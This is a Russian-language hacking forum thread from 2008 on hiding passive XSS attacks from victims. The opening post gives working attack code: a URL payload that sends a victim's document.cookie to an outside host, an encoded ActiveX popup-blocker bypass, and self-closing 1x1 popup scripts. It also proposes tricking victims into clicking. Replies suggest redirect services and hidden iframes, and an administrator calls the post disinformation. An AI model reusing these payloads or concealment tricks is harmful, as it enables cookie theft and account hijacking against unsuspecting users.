HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Маскировка пассивных Xss
  #1  
Старый 07.04.2008, 18:16
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
С нами: 9785147

Репутация: 137
По умолчанию Маскировка пассивных Xss

И так разработкой данного метода маскировки меня сподвигла
огромная актуальность пассивных xss уязвимостей . как минимум каждый 2рой сайт в рунете уязвим

но вот загвоздка этих атак заключается в там что не каждый юзер пойдёт по ссылке типа

Код:
http://irc.run.net/cgi-bin/irc.cgi?item=fmain&interface=ie&style=gothic<script>img = new Image(); img.src = "http://antichat.org/s/red.gif?"+document.cookie;</script>
да и перенапрвление не даёт должной беспаливности так как оказываясь перенаправленным юзер конешно увидит url .
идеальным бы казалось спрятать страницу с хсс в невидимый фрэйм. но вот куки с него неидут так как фрэйм находится на другом домене

остались всплывающие окна. конешно не идеальный вариант маскировки но всёрвно неплохой (например заходит жертва на нашу страницу вылетает маленькое окошко 1 на 1 . автоматом он думает что это реклама и закрывает его темболее в следующих скриптах приведён пример самостоятельного закрытия этого окошка при передаче куков)


но есть одно НО во всех браузерах есть предупреждение всплывающих окон а у некоторых они отключены вообще

в принципе обход блокировки сплывающих окон в ie можно обойти с помощью ActiveX

Код:
<object id=x classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A width=1 height=1 align=middle> 
<PARAM NAME=ActivateApplets VALUE=1><PARAM NAME=ActivateActiveXControls VALUE=1></object> 
<SCRIPT> 

function shellscript() 
{ 
var xss_site = unescape("%68%74%74%70%3A%2F%2F%69%72%63%2E%6B%67%74%73%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%69%72%63%2E%63%67%69%3F%69%74%65%6D%3D%66%6D%61%69%6E%26%69%6E%74%65%72%66%61%63%65%3D%69%65%26%73%74%79%6C%65%3D%67%6F%74%68%69%63%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E");

msgWindow=open(xss_site,"rastabzc","width=1,height=1'");
setTimeout('   msgWindow.close()   ',4000) 
} 

function main() 
{ 
	x.DOM.Script.execScript(shellscript.toString()); 
	x.DOM.Script.setTimeout("shellscript()"); 
} 

if (window.rasta!=true) { 
	setTimeout('   main()   ',100) 
} 
</script>
где в переменной xss_site зашифрованным в unescape содержится ссылка с xss (просто взял в пример алерт
http://irc.kgts.ru/cgi-bin/irc.cgi?item=fmain&interface=ie&style=gothic"><scr ipt>alert(1)</script>)

но вот в Опере и Лисе ActiveX вообще нету. что же делать?

наверно вы обратили внимание что при механическом клике на ссылку никакой блокировки не всплывает. а вот если функция её вызывает клик автоматом
скажем так

Код:
<form name="f">
<input type="button" name="n" onClick="zet()">
</form>

<script>
document.f.n.click();

function zet()
{
msgWindow=open("http://www.yandex.ru/","rastabzc","width=1,height=1'");
}
</script>
то блокировка всёравно как не жалко присутствует

остаётся только как можно хитрее поступить с механическим кликом (тоесть заставить жертву не только зайти на страницу но ещё и щёлкнуть по ней мышкой)

прибегнем немножко к социнженерии

Код:
<body onclick='zet()'>

<script>
function zet()
{
var xss_site = unescape("%68%74%74%70%3A%2F%2F%69%72%63%2E%6B%67%74%73%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%69%72%63%2E%63%67%69%3F%69%74%65%6D%3D%66%6D%61%69%6E%26%69%6E%74%65%72%66%61%63%65%3D%69%65%26%73%74%79%6C%65%3D%67%6F%74%68%69%63%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E");
msgWindow=open(xss_site,"rastabzc","width=1,height=1'");
setTimeout('   msgWindow.close()   ',4000); 
}
</script>
</body>
помимо этого кода в странице должно быть чтонибуть интересное что бы заставило нажать жертву на кнопку


Но я неочень люблю Соц инженерию (особенно представляться блондинкой с большой грудью просящей посмотреть на фотки.exe или что то в этом роде). хотелось бы сделать атаку как можно автоматизированее

и вот меня осенило что если сделать это механическое нажатие вынужденным ( ну тоесть когда на странице выскакивает алерт или ошибка мы сначало должны его закрыть а потом уже страницу. (закрыть сразу страницу с открытм алертом неполучиться) и собственно что бы её закрыть мы должны по ней щёлкнуть мышью)

вот вам пример вынужденного механического нажатия. кто поможет реализовать этот метод буду очень благодарен
кому интересно прошу развивать тему

Последний раз редактировалось ZET36; 07.04.2008 в 18:19..
 
Ответить с цитированием

  #2  
Старый 07.04.2008, 18:20
~Real F@ck!~
Постоянный
Регистрация: 09.07.2006
Сообщений: 443
С нами: 10441826

Репутация: 354
По умолчанию

был какой то сайт, там вводиш урл пассивки, он тебе даёт урл переадресации с ихнего сайта на эту пассивку, то есть пассивки в урл незаметно, ну можно правдо определить по урлу на этот сайт.
 
Ответить с цитированием

  #3  
Старый 07.04.2008, 18:36
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
С нами: 9785147

Репутация: 137
По умолчанию

Цитата:
Сообщение от ~Real F@ck!~  
был какой то сайт, там вводиш урл пассивки, он тебе даёт урл переадресации с ихнего сайта на эту пассивку, то есть пассивки в урл незаметно, ну можно правдо определить по урлу на этот сайт.
что то непонимаю как такое можно реализовать, простая переадресация всёравно выкидывает юзера на страницу с хсс где он обнаружит что то неладное.
 
Ответить с цитированием

  #4  
Старый 07.04.2008, 18:41
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

ИМХО самое актуальное - это вставлять xss в невидимый ифрейм на поломанном сайте и кинуть ссылку недругу. Так и урла не видно, и можно xss через POST сделать
__________________
 
Ответить с цитированием

  #5  
Старый 07.04.2008, 18:47
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
С нами: 9785147

Репутация: 137
По умолчанию

Цитата:
Сообщение от +toxa+  
ИМХО самое актуальное - это вставлять xss в невидимый ифрейм на поломанном сайте и кинуть ссылку недругу. Так и урла не видно, и можно xss через POST сделать
авторизованные куки через ифрэйм как не жаль не будут ийти так как страница с фреймом находится на другом домене.

можеш сам проверить например вставь в фрэйм сайт где у тебя запомнен пароль. ну тоесть при обычном вызове этого сайта ты будеш авторизирован а через фрэйм нет
 
Ответить с цитированием

  #6  
Старый 07.04.2008, 22:13
ettee
Administrator
Регистрация: 12.10.2006
Сообщений: 466
С нами: 10304966

Репутация: 5170
По умолчанию

~Real F@ck!~, https://forum.antichat.ru/thread43786.html
ZET36, почему я не верю?
Перестаньте нести дезинформацию в народ.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Скупка пассивных Xss: до 0.25$ за ссылку. Fan Freelance - О Работе 64 07.04.2008 16:55
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...